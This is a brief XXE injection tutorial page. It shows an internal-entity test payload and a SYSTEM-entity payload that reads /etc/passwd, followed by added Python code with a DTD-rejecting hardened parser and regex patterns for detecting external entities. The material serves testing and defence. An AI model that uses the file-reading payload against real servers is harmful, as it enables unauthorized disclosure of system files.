XXE Injection

Basic Test for XXE

<?xml version="1.0" ?>

<!DOCTYPE replace [<!ENTITY example "XXE Injection"> ]>

<details>

<subnet_mask>&example;</subnet_mask>

<test></test>

</details>

  • The name "example" is just the name of the entity (variable)

    • It could be anything you want

  • Use "SYSTEM" to read files on the server

    • enclose the file path in quotes

<?xml version="1.0" ?>

<!DOCTYPE replace [<!ENTITY example SYSTEM "/etc/passwd"> ]>

<details>

<subnet_mask>&example;</subnet_mask>

<test></test>

</details>
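Both probes above only do anything if the receiving parser honours entities declared in an inline DTD. The following Python example is added here and is not part of the original page: it shows that the standard-library ElementTree parser expands the internal entity from the basic test by default (which is why a response echoing "XXE Injection" is a reliable indicator), a hardened expat-based parser that rejects any DOCTYPE before content is processed, and a small classifier that can be run over incoming requests or logs to flag DTDs and external (SYSTEM/PUBLIC) entity declarations. The payloads, element names and the `subnet_mask` field are constructed sample data shaped like the page's probes.

```python
import re
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat

# Constructed sample documents, same shape as the probes on the page.
PROBE_INTERNAL = b"""<?xml version="1.0" ?>
<!DOCTYPE replace [<!ENTITY example "XXE Injection"> ]>
<details><subnet_mask>&example;</subnet_mask><test></test></details>"""

PROBE_SYSTEM = b"""<?xml version="1.0" ?>
<!DOCTYPE replace [<!ENTITY example SYSTEM "/etc/passwd"> ]>
<details><subnet_mask>&example;</subnet_mask><test></test></details>"""

BENIGN = b"""<?xml version="1.0" ?>
<details><subnet_mask>255.255.255.0</subnet_mask><test></test></details>"""

# Detection patterns for a pre-parse check or log review.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)
EXTERNAL_ENTITY_RE = re.compile(
    rb"<!ENTITY\s+(%\s*)?[^\s>]+\s+(SYSTEM|PUBLIC)\b", re.IGNORECASE
)


def classify(doc: bytes) -> str:
    """Label a document: 'external-entity', 'dtd' (internal entities only) or 'no-dtd'."""
    if EXTERNAL_ENTITY_RE.search(doc):
        return "external-entity"
    if DOCTYPE_RE.search(doc):
        return "dtd"
    return "no-dtd"


def parse_unsafely(doc: bytes) -> str:
    """Default ElementTree behaviour: entities declared in the inline DTD are expanded."""
    root = ET.fromstring(doc)
    return root.findtext("subnet_mask") or ""


class DtdRejected(ValueError):
    """Raised by parse_safely when the document carries a DOCTYPE."""


def parse_safely(doc: bytes) -> str:
    """Hardened parser: abort as soon as a DOCTYPE appears, before any entity is used."""
    parser = expat.ParserCreate()
    text: list[str] = []
    state = {"in_mask": False}

    def start_doctype(name, sysid, pubid, has_internal_subset):
        # Rejecting DTDs outright removes both external and internal entity attacks.
        raise DtdRejected("DOCTYPE declarations are not accepted")

    def start_element(name, attrs):
        state["in_mask"] = name == "subnet_mask"

    def end_element(name):
        state["in_mask"] = False

    def char_data(data):
        # expat may deliver text in several chunks; collect and join them.
        if state["in_mask"]:
            text.append(data)

    parser.StartDoctypeDeclHandler = start_doctype
    parser.StartElementHandler = start_element
    parser.EndElementHandler = end_element
    parser.CharacterDataHandler = char_data
    parser.Parse(doc, True)
    return "".join(text)


def safe_parse_result(doc: bytes) -> tuple[str, str]:
    """Wrapper returning ('ok', value) or ('rejected', reason) for easy checking."""
    try:
        return ("ok", parse_safely(doc))
    except DtdRejected as exc:
        return ("rejected", str(exc))


if __name__ == "__main__":
    for label, doc in [("internal", PROBE_INTERNAL), ("system", PROBE_SYSTEM), ("benign", BENIGN)]:
        print(label, classify(doc), safe_parse_result(doc))
    print("unsafe parse of basic probe:", parse_unsafely(PROBE_INTERNAL))
```

Rejecting every DOCTYPE is the simplest safe policy for an API that never legitimately needs one; if DTDs must be accepted, the same expat handlers (`EntityDeclHandler`, `ExternalEntityRefHandler`) can be used to refuse only external and parameter entities.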
